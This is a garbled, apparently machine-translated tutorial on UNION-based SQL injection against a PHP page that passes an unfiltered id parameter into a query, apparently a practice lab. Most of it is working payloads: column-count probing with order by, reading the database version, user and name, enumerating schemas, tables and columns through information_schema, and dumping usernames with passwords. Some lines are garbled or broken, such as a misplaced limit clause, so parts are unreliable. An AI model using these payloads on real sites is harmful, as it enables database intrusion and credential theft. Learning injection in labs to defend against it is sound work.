Introduction 0x00_
Union operator is used to combine two or more of the select statement set of search results.
In sql injection attack, to make the union successfully performed, four conditions must be met:
1, in an internal database with the same number of fields.
2, the same data type column.
3, the order of the select statement must be the same.
4, the current page has echoed the point.
General Procedure implantation 0x01_Union
- order by field judge
- View echo location data
- Reading Library Information
- Reading table information
- Reading field
- Read Data
0x02_ database syntax
1. Database query
select column_name from table_name
2. About order by and limit
If you have used and limit order by the query, the back can not talk to select
the wrong demonstration
select *from users order by id union select 1,2,3;
select *from users limit 0,1 union select 1,2,3;
GET reasons exist injected directly into the id, id no filtering of the source id = '$ id' comprising ', we need to close.
Section Source:
$id=$_GET['id'];
%sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Query version
select * from users where id=-1 union select 1,(select version()),3;
Sao 0x03_ injection operation
in the source id = '$ id' comprising ', we need to close. - notes behind + '
/?id=1' order by 1--+
2, 3 and 4, being given field is determined 3
/?id=1' order by 4--+
Then start injecting Union, to write a simple sentence, remove the id value, only to return us to the echo data
/?id' union select 1,2,3--+
/?id=' union select 1,(select version()),3--+
/?id=' union select 1,(select user()),3--+
/?id=' union select 1,(select database()),3--+
Modify limt 0,1 0 can see this in the following data
/?id=' union select 1,(select schema_name from information_schema.schemata limit 0,1),3--+
A plurality of sets of data GROUP_CONCAT return ()
/?id=' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
Table View
/?id=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
/?id=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
For more information on table
/?id=' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+
Simple read
/?id=' union select 1,2,username from users--+
/?id=' union select 1,2,concat_ws(':',username,password) from users--+
/?id=' union select 1,concat_ws(':',username,password) from users limit 2,1,3--+